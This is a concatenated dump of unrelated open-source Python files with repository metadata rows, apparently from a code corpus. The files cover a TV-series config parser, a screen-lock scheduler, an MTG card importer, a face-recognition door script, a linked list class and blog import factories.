grid = gridUniform()
| UTF-8 | Python | false | false | 2,070 | py | 30 | gridUniform.py | 7 | 0.615459 | 0.606763 | 0 | 81 | 24.469136 | 93 |
szpaczyna/cherry_conf | 5,446,018,577,128 | e5a0bc6c148714f90ba327814586dc28bc1b0f9d | 7ce114b97cbe0410dfa338f757115b93e7e5a990 | /scripts/tvs/config.py | 27ed71efab090343d51fb7576056ef32aaaea535 | []
| no_license | https://github.com/szpaczyna/cherry_conf | 23327fa2ff75fdee25dc946f3cc698c3c754e291 | 52f2108873a6323b2b8d997a1f5d79a1ecb8f313 | refs/heads/master | 2021-01-15T15:43:53.838450 | 2016-10-04T17:35:17 | 2016-10-04T17:35:17 | 36,720,615 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | #!/usr/bin/env python
#-*- coding: utf8 -*-
# Copyright 2009-2012 Kamil Winczek <kwinczek@gmail.com>
#
# This file is part of series.py.
#
# series.py is free software: you can redistribute it and/or modify it under
# the terms of the GNU General Public License as published by the Free
# Software Foundation, either version 3 of the License, or (at your option)
# any later version.
#
# series.py is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
# FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License
# for more details.
#
# You should have received a copy of the GNU General Public License along
# with series.py. If not, see http://www.gnu.org/licenses/.
import datetime
import os
import re
import shelve
import sys
from optparse import OptionParser, OptionGroup
# --------------------------------------------------------------------- #
# #
# Configuration #
# #
# --------------------------------------------------------------------- #
DEFAULT_CONFIG_DIR = os.path.join(os.getenv('HOME'), '.tvseries')
DEFAULT_CONFIG_FILE = os.path.join(DEFAULT_CONFIG_DIR, 'config')
DEFAULT_CACHE_FILE = os.path.join(DEFAULT_CONFIG_DIR, '.cache')
DEFAULT_CACHE_IDS = os.path.join(DEFAULT_CONFIG_DIR, '.ids')
def opt_parse():
"""Define cmd line options"""
usage = "TVRage.com parser by crs (http://winczek.com/tvseries/)\nusage: %prog [options] [title ...]"
parser = OptionParser(usage, version="%prog 0.6.6" )
group_a = OptionGroup(parser, "Actions")
group_p = OptionGroup(parser, "Program control")
group_f = OptionGroup(parser, "Files locations")
group_a.add_option("-w", "--when", dest="when",
help="Print series for given day only. Values: yesterday, today, tommorow or date in format: YYYY-DD-MM.")
group_a.add_option("-s", "--season", dest="season", action="store", default=None,
help="Print given season only. Values: <int>, '0' for current one; 'all' for all seasons.")
group_a.add_option("-e", "--episode", dest="episode", action="store",
help="Print given episode only. To be used with --season only. Values: <int>.")
group_f.add_option("-f", "--config-file", dest="configfile",
default=DEFAULT_CONFIG_FILE,
help="Read config from CONFIGFILE.")
group_f.add_option("-c", "--cache-file", dest="cachefile",
default=DEFAULT_CACHE_FILE,
help="Read cache from CACHEFILE.")
group_f.add_option("-i", "--cache-ids", dest="cacheids",
default=DEFAULT_CACHE_IDS,
help="Read shows ids cache from CACHEIDS.")
group_p.add_option("--with-specials", dest="with_specials", action="store_true", default=False,
help="Print special episodes as well as regular ones.")
group_a.add_option("--calendar", dest="g_calendar", action="store_true", default=False,
help="Update google calendar with episodes broadcast information.")
group_p.add_option("-m", "--no-color", dest="nocolor", action="store_true", default=False,
help="Use monochromatic display. Do not print colors.")
group_p.add_option("-n", "--no-cache", action="store_false", default=True, dest="cache",
help="Do not use caching. ON by default.")
group_p.add_option("-r", "--refresh", action="store_true", default=False, dest="refresh",
help="Force downloading and refreshing cache.")
group_p.add_option("-v", "--verbose", default=False,
action="store_true", dest="verbose")
group_p.add_option("-d", "--debug", default=False,
action="store_true", dest="debug")
group_p.add_option("--no-spinner", action="store_false", default=True, dest="spinner",
help="Do not show spinner while performing network operations.")
group_p.add_option("--print-settings", dest="print_settings_and_exit", action="store_true", default=False,
help="Print settings and exit.")
parser.add_option_group(group_a)
parser.add_option_group(group_p)
parser.add_option_group(group_f)
(options, args) = parser.parse_args()
# Validate parameters:
# --season
if options.season:
if options.season == 'all':
options.season = -1
elif options.season == '0':
options.season = -2
else:
try:
options.season = int(options.season)
except:
parser.error('Invalid season value')
if options.season < -2 or options.season > 1000:
parser.error("Season value not in range 0-1000")
# No cache and refresh?
if not options.cache and options.refresh:
parser.error("--no-cache and --refresh cannot be used together.")
# --episode
if options.episode:
if not options.season:
parser.error("Please use -s <n> to specify season.")
try:
options.episode = int(options.episode)
except:
parser.error('Invalid episode value')
if options.episode < 1 or options.episode > 1000:
parser.error("Episode value not in range 1-1000")
# --when
if options.when:
if options.when.lower() in ['yesterday', 'today', 'tomorrow']:
when_map = {'yesterday': datetime.date.today() - datetime.timedelta(1),
'today': datetime.date.today(),
'tomorrow': datetime.date.today() + datetime.timedelta(1)}
options.when = when_map[options.when.lower()]
elif re.match('[0-9]{4}[-][0-9]{2}[-][0-9]{2}', options.when):
options.when = datetime.datetime.strptime(options.when, '%Y-%m-%d').date()
else:
parser.error('--when - Invalid argument.\nTry: today, yesterday, tomorrow or date in format YYYY-MM-DD')
# Checking for required files
if not os.path.exists(DEFAULT_CONFIG_DIR):
os.makedirs(DEFAULT_CONFIG_DIR)
if not os.path.exists(options.configfile):
open(options.configfile, 'w').close()
if not os.path.exists(options.cachefile):
shelve.open(options.cachefile).close()
if not os.path.exists(options.cacheids):
shelve.open(options.cacheids).close()
return (options, args)
# ---------------------------------------------------------------------
def read_config_file(configfile):
# Default configuration is stored here.
series = []
g_creds = {'login':'', 'passwd':''}
templates = {'list_header_format': '[ %(c_blue)s%(name)s:%(c_red)s Season %(season_no)s%(c_none)s ]',
'list_format': '[%(ep_ident)s] %(ep_title)-25.24s @ %(ep_airdate)s',
'list_format_verbose': 'No: %(ep_epnum)04s [%(ep_ident)s] %(ep_title)-25.24s @ %(ep_airdate)s\n\t\t%(ep_link)s',
'when_day_format': '.. %(when_day)s ..',
'when_name_format': '[ %(c_blue)s%(name)s%(c_none)s ]',
'when_format': '%(ep_airdate)s [%(ep_ident)s] %(ep_title)s',
'single_header_format': '',
'single_format': '%(name)s [%(ep_ident)s] %(ep_title)s.avi',
'info_header_format': '[ %(c_blue)s%(name)s%(c_none)s ]',
'info_verbose_format':
""" Country: %(origin_country)s
Network: %(network)s
Airtime: %(airday)s at %(airtime)s [%(timezone)s]
Runtime: %(runtime)s mins
Class: %(classification)s
Started: %(started)s
Status: %(status)s
Genres: %(genres)s
Seasons: %(totalseasons)s
Episodes: %(totalepisodes)s
Weblink: %(showlink)s
Akas: \n%(akas)s\n""",
'info_prev_format': 'Previous episode: [ %(prev_ep_ident)s ] %(prev_ep_title)-21.20s @ %(prev_ep_airdate)s',
'info_next_format': ' Next episode: [ %(next_ep_ident)s ] %(next_ep_title)-21.20s @ %(next_ep_airdate)s',
'date_format': '%d %h %Y'}
# Read config file and overwrite default values if directives found.
lineno = 0
for line in open(configfile).readlines():
lineno += 1
line = line.strip()
if not line or line.startswith('#'):
continue
try:
key, value = line.split('=', 1)
        except ValueError:  # a line without '=' makes the tuple unpacking fail
sys.stderr.write("Config file corrupted or incorrect. Error at line: %d\n" % (lineno,))
sys.stderr.write("Line: %s\n" % line)
sys.stderr.write("Please refer to README for correct configuration directives\n")
sys.exit(3)
if key == 'series':
if value.endswith(','):
                value = value[:-1]
if not value:
series = None
else:
series = [el.replace('\n', '') for el in value.split(',')]
continue
if key in ('list_header_format', 'list_format', 'list_format_verbose', 'single_header_format',
'info_verbose_format',
'single_format', 'info_header_format', 'info_prev_format',
'info_next_format', 'date_format',
'when_name_format', 'when_day_format', 'when_format'):
templates[key] = value
continue
if key == 'g_login':
g_creds['login'] = value
continue
if key == 'g_passwd':
g_creds['passwd'] = value
continue
else:
sys.stderr.write("Invalid configuration directive at line %d.\n" % (lineno,))
sys.stderr.write("Line: %s\n" % line)
sys.stderr.write("Please refer to README for correct configuration directives.\n")
sys.exit(3)
return (series, templates, g_creds)
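# Illustrative only -- a minimal ~/.tvseries/config using the directives
# recognised above (the values are made up):
#   series=Dexter,The Wire,Breaking Bad
#   date_format=%d %h %Y
#   g_login=me@example.com
#   g_passwd=secret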
| UTF-8 | Python | false | false | 10,069 | py | 16 | config.py | 11 | 0.558943 | 0.551793 | 0 | 249 | 39.437751 | 130 |
stuart12/python-scripts | 19,602,230,768,430 | 2b544001b41d040807e3c58f396fdb2013972640 | 3632f84661fa31f67c5f82bca36d65a80a12112f | /lockscreen4bed | c63668372d57b42b529b4b76d7c1eaceeae3fc69 | []
| no_license | https://github.com/stuart12/python-scripts | a67acdee4eb1906a4dd732efe1d346e3c6cf38fb | 4b3419587259f33153682376f3f7ca6ad60d7de0 | refs/heads/master | 2023-04-23T03:57:47.439494 | 2023-04-04T21:19:00 | 2023-04-04T21:19:00 | 3,964,348 | 0 | 1 | null | null | null | null | null | null | null | null | null | null | null | null | null | #!/usr/bin/python3
# lockscreen4bed Copyright (c) 2016,2018 Stuart Pook (http://www.pook.it/)
# Lock the screen every 15 minutes when it is time to go to bed.
# This program is free software: you can redistribute it and/or modify it under
# the terms of the GNU General Public License as published by the Free Software
# Foundation, either version 3 of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but WITHOUT ANY
# WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
# FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
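# Illustrative invocation (flags defined in main() below; the values are made up):
#   lockscreen4bed --hours "0-5,23" --minutes "0,15,30,45" --gnome -v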
import argparse
import sys
import os
import subprocess
import shlex
def myname():
return os.path.basename(sys.argv[0])
try:
from apscheduler.schedulers.blocking import BlockingScheduler
except ImportError as x:
sys.exit(myname() + ": apscheduler not installed, on Debian do: sudo apt-get install python3-apscheduler")
def verbose(options, level, *message):
if options.verbosity >= level:
print(myname() + ":", *message, file=sys.stderr)
def quote_command(command):
return " ".join(shlex.quote(x) for x in command)
def call(cmd, options=None):
verbose(options, 1, quote_command(cmd))
subprocess.check_call(cmd)
def doit(options=None):
if options.gnome:
call(["xset", "dpms", "force", "off"], options=options)
call(["gnome-screensaver-command", "--lock"], options=options)
else:
call(["light-locker-command", "--lock"], options=options)
def main():
parser = argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter,
description="send me to bed")
parser.add_argument("-v", "--verbosity", action="count", default=0, help="increase output verbosity")
#parser.add_argument("--min_play_time", metavar="SECONDS", type=int, default=9, help="minimum")
parser.add_argument("-m", "--minutes", metavar="MINUTES", default="14,29,44,59", help="minutes in cron format")
parser.add_argument("-H", "--hours", metavar="HOURS", default="0-4,22-23", help="hours in cron format")
parser.add_argument('-g', "--gnome", action="store_true", help="use GNOME lock commands")
#parser.add_argument('urls', nargs=argparse.REMAINDER, help='urls to (permanently) add to the play list')
options = parser.parse_args()
cron = BlockingScheduler()
cron.add_job(doit, kwargs={'options': options}, trigger='cron', hour=options.hours, minute=options.minutes)
cron.start()
if __name__ == "__main__":
main()
| UTF-8 | Python | false | false | 2,716 | 65 | lockscreen4bed | 65 | 0.702504 | 0.690722 | 0 | 65 | 40.784615 | 115 |
|
teotiwg/studyPython | 5,935,644,813,471 | 2123fecaee96ab4beac288e5ef75de9116ec4c98 | 6a74ae0a776dfa50e946651362ff97326fc9f6e1 | /200/pt5/185.py | 2a8eaf04454ef628d762f9de3583090c3c9ab18d | []
| no_license | https://github.com/teotiwg/studyPython | 799c1307d50ad77a27b8a8ca59c79b79f07c29cd | fd0c7f8af9b0ba9d832818d42aec320386bf857b | refs/heads/master | 2023-02-17T17:04:23.809231 | 2021-01-11T09:27:20 | 2021-01-11T09:27:20 | 327,474,697 | 1 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | visitIp = []
with open('access_log', 'r') as f:
logs = f.readlines()
for log in logs:
log = log.split()
ip = log[0]
if ip not in visitIp:
visitIp.append(ip)
print('Visitor count: [%d]' %len(visitIp)) | UTF-8 | Python | false | false | 245 | py | 124 | 185.py | 124 | 0.514768 | 0.510549 | 0 | 11 | 20.636364 | 34 |
ceasaro/magic | 15,470,472,204,530 | f8df275b8125ad52fed3ed6217d49a1d0eb0015c | 5a9db657d4d58704be48a9b3a8e5bb10de01d053 | /web_app/magic/im_export/mtgjson.py | 7a0f30d3ff85125ec458bb43afa29c028a8c8ddc | []
| no_license | https://github.com/ceasaro/magic | b6445f0ab95aa0dcaf0a4c4ad2e7ec9b01eac6e4 | 74d284b08ef2aa29526d63022811808e8ca687be | refs/heads/master | 2023-04-15T17:08:19.163665 | 2023-04-01T13:38:23 | 2023-04-01T13:38:23 | 77,072,334 | 1 | 0 | null | false | 2023-01-12T08:38:14 | 2016-12-21T17:26:04 | 2020-07-30T12:38:52 | 2023-01-12T08:38:14 | 251,919 | 0 | 0 | 22 | JavaScript | false | false | import json
from datetime import datetime
import logging
from magic.core.exception import ManaValidationError
from magic.core.models import Card, Set
logger = logging.getLogger(__name__)
def import_cards(json_data, verbosity=0):
for card_name, card in json_data.items():
try:
new_card, created = create_or_update_card(card)
if verbosity >= 2:
print("{}: {}".format("ADDED" if created else "UPDATED", card_name))
except Exception as e:
print("ERROR import card: {}. Cause {}".format(card_name, e))
raise e
def create_or_update_card(card, set=None):
    # `set` defaults to None so import_cards() above (which has no Set) can
    # call this too; note the parameter name shadows the built-in set().
new_card, created = Card.objects.update_or_create(
name=card.get("name"),
set=set,
external_id=card.get("id"),
defaults={
"_types": ",".join(card.get("types", [])),
"_subtypes": ",".join(card.get("subtypes", [])),
"_supertypes": ",".join(card.get("supertypes", [])),
"type_line": card.get("type", None),
"text": card.get("text", None),
"mana_cost": card.get("manaCost", "").translate(
{ord(c): None for c in "{}"}
),
"cmc": card.get("cmc", 0),
"_power": card.get("power", 0),
"_toughness": card.get("toughness", 0),
},
)
return new_card, created
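# Illustrative only -- judging by the accessors above, a card dict from
# mtgjson.com looks roughly like:
#   {"name": "Llanowar Elves", "id": "...", "types": ["Creature"],
#    "subtypes": ["Elf", "Druid"], "manaCost": "{G}", "cmc": 1,
#    "power": "1", "toughness": "1", "text": "..."}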
def import_sets(json_data, verbosity=0):
for set_name, set_data in json_data.items():
try:
set, set_created = Set.objects.update_or_create(
name=set_data["name"],
code=set_data["code"],
type=set_data["type"],
gathererCode=set_data.get("gathererCode"),
releaseDate=datetime.strptime(set_data["releaseDate"], "%Y-%m-%d"),
)
except Exception as e:
print("ERROR creating set: {}. Cause {}".format(set_name, e))
raise e
i = 0
for card in set_data["cards"]:
i += 1
try:
new_card, created = create_or_update_card(card, set)
            except ManaValidationError:
                logger.warning("Unknown mana for card: {}".format(card))
                continue  # new_card/created are unbound here, so skip the log below
except Exception as e:
logger.error(
"ERROR import card: {}. Cause {}".format(json.dumps(card), e)
)
raise e
if verbosity >= 2:
logger.info(
"{}: {}".format("ADDED" if created else "UPDATED", card["name"])
)
logger.info("{} cards in set {}".format(i, set_name))
| UTF-8 | Python | false | false | 2,630 | py | 82 | mtgjson.py | 68 | 0.509125 | 0.505703 | 0 | 76 | 33.605263 | 84 |
dreadkopp/activejob_bootstrap | 618,475,328,303 | 7b2757422309e9c8cff3b22b3a058f80efa1c07a | 47e3f13ce4e42fc157db6580154acd3e9a7169d7 | /activejob/activejob/berufsfelder/views.py | d6401d7f826ce04fc7bdb398f0ad68608e03a117 | []
| no_license | https://github.com/dreadkopp/activejob_bootstrap | d266c15565f1371cd9c271de093c9570e0511231 | 8bcdb73f1f95265a06a8e9c751113ccf0cce67eb | refs/heads/master | 2020-12-30T13:40:19.351153 | 2017-08-22T15:48:28 | 2017-08-22T15:48:28 | 91,242,018 | 0 | 1 | null | false | 2017-08-22T15:48:29 | 2017-05-14T12:30:55 | 2017-07-01T19:55:25 | 2017-08-22T15:48:28 | 20,145 | 0 | 1 | 0 | Python | null | null | from .models import Berufsfelder
from core.views import SearchAndMenuDetailView
class BerufsfelderView(SearchAndMenuDetailView):
def dispatch(self, request, *args, **kwargs):
self.active_nodes = {
"top": "bewerber",
"left": "bewerber_" + kwargs["slug"],
"sub": "Berufsfelder",
}
return super().dispatch(request, *args, **kwargs)
model = Berufsfelder
template_name = "web/pages/berufsfelder.html"
| UTF-8 | Python | false | false | 472 | py | 135 | views.py | 72 | 0.631356 | 0.631356 | 0 | 16 | 28.5 | 57 |
gunnarviking/2019_Stockholm_suntory_strong | 11,115,375,388,345 | 8c35ac2f1e8d82e2839c8b386353452c044da2c7 | a029e78f6978410fef96b84db7475afec307c245 | /services/filter_service/filter_service.py | 5c8fce9122f1f8ee914fa6e50e6040d1cb365e5a | [
"MIT"
]
| permissive | https://github.com/gunnarviking/2019_Stockholm_suntory_strong | c29e61f1faba3e21bd4b081b685798975ad00780 | a1fc6e7c1a7317c3cb8bd33a00a0f0bc7fe3e1a7 | refs/heads/master | 2022-12-21T11:22:34.257659 | 2019-11-03T12:25:34 | 2019-11-03T12:25:34 | 219,287,522 | 0 | 0 | null | false | 2022-12-10T07:41:05 | 2019-11-03T11:03:20 | 2019-11-03T12:25:47 | 2022-12-10T07:41:04 | 3,014 | 0 | 0 | 3 | Python | false | false | from common import filter_service_data_collection
from common import filter_service_filter
from common import filter_service_save
def main():
print("main")
filelist = filter_service_data_collection.init()
counter = 0
if filelist is not None:
for file in filelist:
            counter += 1
            print("counter:", counter)
print("for file", file)
newfile = filter_service_filter.init(file)
if newfile is not None:
filter_service_save.init(newfile, counter)
newfile = None
if __name__ == '__main__':
main()
| UTF-8 | Python | false | false | 603 | py | 30 | filter_service.py | 13 | 0.605307 | 0.60199 | 0 | 21 | 27.714286 | 58 |
abnerjacobsen/Smart_Office | 16,827,681,880,246 | 61c23d613c2df778a4b2b055841f034b83bc1a61 | 32a4ebfaf311a33dfa0e360c98c9b8c4a95332a5 | /Front_Desk_Facial_Recognition/recognition/recognise.py | 5ba49add017772b21d97a24be8e698e3912288a5 | []
| no_license | https://github.com/abnerjacobsen/Smart_Office | 726b89d1f2fd11c635f18b1d9c57c48bec87842c | 2c0395f916dab94bf4ed96375f0d1b92a53c26a3 | refs/heads/master | 2020-04-26T20:57:40.201495 | 2019-03-02T02:24:15 | 2019-03-02T02:24:15 | 173,827,837 | 1 | 1 | null | true | 2019-03-04T21:57:06 | 2019-03-04T21:57:05 | 2019-03-02T02:24:17 | 2019-03-02T02:24:15 | 1,745 | 0 | 0 | 0 | null | false | null | # USAGE
# With default parameters
# python3 03_recognise.py
# OR specifying the encodings, screen resolution, output video and display
# python3 03_recognise.py -e encodings.pickle -r 240 -o output/capture.avi -y 1
## Acknowledgement
## This code is adapted from:
## https://www.pyimagesearch.com/2018/06/18/face-recognition-with-opencv-python-and-deep-learning/
"""This module is used to encode images into an encodings.pickle file for face recognition to reference from"""
# import the necessary packages
from imutils.video import VideoStream
import face_recognition
from sense_hat import SenseHat
import argparse
import imutils
import pickle
import time
import cv2
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# construct the argument parser and parse the arguments
ap = argparse.ArgumentParser()
ap.add_argument("-e", "--encodings", default='/home/pi/Assignment_Two/Front_Desk_Facial_Recognition/recognition/encodings.pickle',
help="path to serialized db of facial encodings")
ap.add_argument("-r", "--resolution", type=int, default=240,
help="Resolution of the video feed")
ap.add_argument("-o", "--output", type=str,
help="path to output video")
ap.add_argument("-y", "--display", type=int, default=0,
help="whether or not to display output frame to screen")
ap.add_argument("-d", "--detection-method", type=str, default="hog",
help="face detection model to use: either `hog` or `cnn`")
args = vars(ap.parse_args())
# Prepare the SenseHat and the LED matrix colour data
# (note: this rebinds the class name SenseHat to the instance)
SenseHat = SenseHat()
g1 = [0, 150, 0]
g2 = [0, 255, 0]
r = [255, 0, 0]
o = [0, 0, 0]
loading = [
g1, g1, g1, g1, g1, g1, g1, g1,
g1, g1, g1, g1, g1, g1, g1, g1,
g1, g1, g1, g1, g1, g1, g1, g1,
g1, g1, g1, g1, g1, g1, g1, g1,
g1, g1, g1, g1, g1, g1, g1, g1,
g1, g1, g1, g1, g1, g1, g1, g1,
g1, g1, g1, g1, g1, g1, g1, g1,
g1, g1, g1, g1, g1, g1, g1, g1
]
working = [
g2, g2, g2, g2, g2, g2, g2, g2,
g2, g2, g2, g2, g2, g2, g2, g2,
g2, g2, g2, g2, g2, g2, g2, g2,
g2, g2, g2, g2, g2, g2, g2, g2,
g2, g2, g2, g2, g2, g2, g2, g2,
g2, g2, g2, g2, g2, g2, g2, g2,
g2, g2, g2, g2, g2, g2, g2, g2,
g2, g2, g2, g2, g2, g2, g2, g2
]
failed = [
o, r, r, r, r, r, o, o,
o, r, r, r, r, r, o, o,
o, r, r, o, o, o, o, o,
o, r, r, r, r, o, o, o,
o, r, r, r, r, o, o, o,
o, r, r, o, o, o, o, o,
o, r, r, o, o, o, o, o,
o, r, r, o, o, o, o, o,
]
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
def recognise():
"""This function is responsible for using the camera to recognise the
person standing infront of the device. Returns the recognised persons
name."""
#keep track of attempts. Too many attempts will trigger a return.
attempts = 0
# load the known faces and embeddings
print("[INFO] loading encodings...")
data = pickle.loads(open(args["encodings"], "rb").read())
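    # encodings.pickle is assumed to be a dict {"encodings": [...], "names": [...]}
    # (the only two keys used below), as written by the companion encoding script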
# initialize the video stream and pointer to output video file, then
# allow the camera sensor to warm up
#Using a for loop to loop through devices, as a precaution to
#system related issues, whereby a resource might be allocated a different
#device number for various reasons.
print("[INFO] starting video stream...")
for x in range(0, 2):
for x in range(0, 20):
vs = VideoStream(src=x).start()
if str(vs.read()) != "None":
break
if str(vs.read()) != "None":
break
writer = None
#Faint green to indicate starting process
SenseHat.set_pixels(loading)
time.sleep(2.0)
# loop over frames from the video file stream
while True:
SenseHat.set_pixels(working)
        if attempts > 35:  # give up after 35 frames without a match
SenseHat.set_pixels(failed)
time.sleep(1.5)
SenseHat.clear()
cv2.destroyAllWindows()
vs.stop()
return {'code' : 400}
attempts += 1
# grab the frame from the threaded video stream
frame = vs.read()
# convert the input frame from BGR to RGB then resize it to have
# a width of 750px (to speedup processing)
        rgb = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)
        # resize the converted frame (resizing `frame` again would discard
        # the BGR->RGB conversion that face_recognition expects)
        rgb = imutils.resize(rgb, width=args["resolution"])
r = frame.shape[1] / float(rgb.shape[1])
# detect the (x, y)-coordinates of the bounding boxes
# corresponding to each face in the input frame, then compute
# the facial embeddings for each face
boxes = face_recognition.face_locations(rgb,
model=args["detection_method"])
encodings = face_recognition.face_encodings(rgb, boxes)
names = []
# loop over the facial embeddings
for encoding in encodings:
# attempt to match each face in the input image to our known
# encodings
matches = face_recognition.compare_faces(data["encodings"],
encoding)
name = "Unknown"
# check to see if we have found a match
if True in matches:
# find the indexes of all matched faces then initialize a
# dictionary to count the total number of times each face
# was matched
matchedIdxs = [i for (i, b) in enumerate(matches) if b]
counts = {}
# loop over the matched indexes and maintain a count for
# each recognized face face
for i in matchedIdxs:
# name = data["names"][i].split("-")[0].replace("_", " ")
name = data["names"][i]
counts[name] = counts.get(name, 0) + 1
# determine the recognized face with the largest number
# of votes (note: in the event of an unlikely tie Python
# will select first entry in the dictionary)
name = max(counts, key=counts.get)
# update the list of names
names.append(name)
# loop over the recognized faces
for ((top, right, bottom, left), name) in zip(boxes, names):
# rescale the face coordinates
top = int(top * r)
right = int(right * r)
bottom = int(bottom * r)
left = int(left * r)
# print to console, identified person
            personFound = 'Person found: {}'.format(name)
            print(personFound)
            # release the video writer if needed, then clean up once
            if writer is not None:
                writer.release()
            SenseHat.clear()
            cv2.destroyAllWindows()
            vs.stop()
return {'code' : 200, 'identified' : name}
# if the video writer is None *AND* we are supposed to write
# the output video to disk initialize the writer
if writer is None and args["output"] is not None:
fourcc = cv2.VideoWriter_fourcc(*"MJPG")
writer = cv2.VideoWriter(args["output"], fourcc, 20, (frame.shape[1], frame.shape[0]), True)
# if the writer is not None, write the frame with recognized
# faces to disk
if writer is not None:
writer.write(frame)
# check to see if we are supposed to display the output frame to
# the screen
if args["display"] > 0:
cv2.imshow("Frame", frame)
key = cv2.waitKey(1) & 0xFF
# if the `q` key was pressed, break from the loop
if key == ord("q"):
break
# do a bit of cleanup
cv2.destroyAllWindows()
vs.stop()
# check to see if the video writer point needs to be released
if writer is not None:
writer.release()
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#Run Program
if __name__ == '__main__':
recognise() | UTF-8 | Python | false | false | 8,348 | py | 66 | recognise.py | 16 | 0.537973 | 0.512099 | 0 | 224 | 36.272321 | 130 |
luisrs/MmodMMGBSA | 4,114,578,704,261 | 8629f86e1c357d7ad9cc77fd69a0ce6092639464 | c6b91581f08ca963d215dd02cbc80ba53bfe6bca | /fatools/fatools/utils/validation/validations/presence.py | a4fe81fb1668740e615ffa9364f4d8e3fcc44c78 | []
| no_license | https://github.com/luisrs/MmodMMGBSA | c454ffa94ec358f0252dea6dab2f62b798ce26f7 | 73b8252fe7144f763b051c6745097c0418de4244 | refs/heads/master | 2021-01-10T07:38:41.978439 | 2016-02-14T00:04:08 | 2016-02-14T00:04:08 | 43,270,633 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | from fatools.utils.validation.validator import FieldValidator
class PresenceValidator(FieldValidator):
"""Validates that the specified field is present (not None)."""
err_template = "'{name}' is missing"
def validate_field(self, name, value):
if value is None:
raise self._construct_error(name, value)
return True
| UTF-8 | Python | false | false | 358 | py | 79 | presence.py | 79 | 0.684358 | 0.684358 | 0 | 12 | 28.833333 | 67 |
ZainQasmi/LeetCode-Fun | 17,162,689,326,833 | f794ae5a1ff293457b8f3ad30e2f9f137e8ac258 | 1777a2d56daf94d3cbbf99d4a6723fa39dc65488 | /Amazon/quora1.py | 4b26a6a1b1a53fbb20f1f5f817b9ed9c777e6eb8 | []
| no_license | https://github.com/ZainQasmi/LeetCode-Fun | ab390f5d23e71f6b8c173fb55826d8885f968a7d | 1be106af08624cc0653be5df4dc41184356dfa0c | refs/heads/master | 2020-04-19T15:01:31.226811 | 2019-08-01T08:05:55 | 2019-08-01T08:05:55 | 168,262,028 | 1 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | class Node:
def __init__(self, next=None, prev=None, data=None):
self.next = next # reference to next node in DLL
self.prev = prev # reference to previous node in DLL
self.data = data
class DoublyLinkedList:
    def __init__(self):
        self.head = None  # push/insertAfter/append below operate on this head
    # Adding a node at the front of the list
    def push(self, new_data):
# 1 & 2: Allocate the Node & Put in the data
new_node = Node(data = new_data)
# 3. Make next of new node as head and previous as NULL
new_node.next = self.head
new_node.prev = None
# 4. change prev of head node to new node
if self.head is not None:
self.head.prev = new_node
# 5. move the head to point to the new node
self.head = new_node
# This code is contributed by jatinreaper
# Given a node as prev_node, insert
# a new node after the given node
def insertAfter(self, prev_node, new_data):
# 1. check if the given prev_node is NULL
if prev_node is None:
print("This node doesn't exist in DLL")
return
#2. allocate node & 3. put in the data
new_node = Node(data = new_data)
# 4. Make next of new node as next of prev_node
new_node.next = prev_node.next
# 5. Make the next of prev_node as new_node
prev_node.next = new_node
# 6. Make prev_node as previous of new_node
new_node.prev = prev_node
# 7. Change previous of new_node's next node */
if new_node.next is not None:
new_node.next.prev = new_node
# This code is contributed by jatinreaper
# Add a node at the end of the DLL
def append(self, new_data):
# 1. allocate node 2. put in the data
new_node = Node(data = new_data)
last = self.head
# 3. This new node is going to be the
# last node, so make next of it as NULL
new_node.next = None
# 4. If the Linked List is empty, then
# make the new node as head
if self.head is None:
new_node.prev = None
self.head = new_node
return
# 5. Else traverse till the last node
while (last.next is not None):
last = last.next
# 6. Change the next of last node
last.next = new_node
# 7. Make last node as previous of new node */
new_node.prev = last
# This code is contributed by jatinreaper | UTF-8 | Python | false | false | 2,435 | py | 83 | quora1.py | 67 | 0.570842 | 0.563039 | 0 | 85 | 27.647059 | 61 |
slyfrs/aldryn-wordpress-import | 8,607,114,475,732 | 9b3e2f2feb1d180b200e73df07894a8e66888a9d | 8184104b7f42534ae454b5187bb755ffbdfffbd9 | /aldryn_wordpress_import/factories.py | 7da6a21c863c5b302330360e8ac86d144682e1e3 | [
"BSD-3-Clause"
]
| permissive | https://github.com/slyfrs/aldryn-wordpress-import | 3c26947d4a24221e9ec429b4f77e3292fbd0173e | aac70f6a70e1c6544f10e54e500cf6eba73a0b16 | refs/heads/master | 2021-05-08T13:43:24.949380 | 2015-07-09T12:21:29 | 2015-07-09T12:21:29 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | from django.template.defaultfilters import truncatewords_html
from aldryn_blog.models import Post
from cmsplugin_filer_image.models import FilerImage
from djangocms_text_ckeditor.models import Text
def create_post(post_data, parts):
try:
first_part = parts[0]
except IndexError:
first_part = post_data['title']
post_with_slug = Post.objects.filter(slug=post_data['slug'])
if post_with_slug.exists():
raise ValueError('Slug is not unique')
post = Post(
title=post_data['title'],
slug=post_data['slug'],
lead_in=truncatewords_html(first_part, 55),
publication_start=post_data['publication_start'],
author=post_data['user'],
language=post_data['language'],
)
post.save()
return post
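# Illustrative only -- create_post() expects post_data shaped like
#   {'title': ..., 'slug': ..., 'publication_start': datetime, 'user': <User>,
#    'language': 'en'}
# and `parts` as the list of body chunks (the first becomes the lead-in).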
def create_filer_plugin(filer_image, target_placeholder, language):
image_plugin = FilerImage(image=filer_image)
image_plugin.position = 0
image_plugin.tree_id = 0
image_plugin.lft = 0
image_plugin.rght = 0
image_plugin.level = 0
image_plugin.plugin_type = 'FilerImagePlugin'
image_plugin.language = language
image_plugin.placeholder = target_placeholder
image_plugin.save()
return image_plugin
def create_text_plugin(content, target_placeholder, language):
text = Text(body=content.decode('utf-8'))
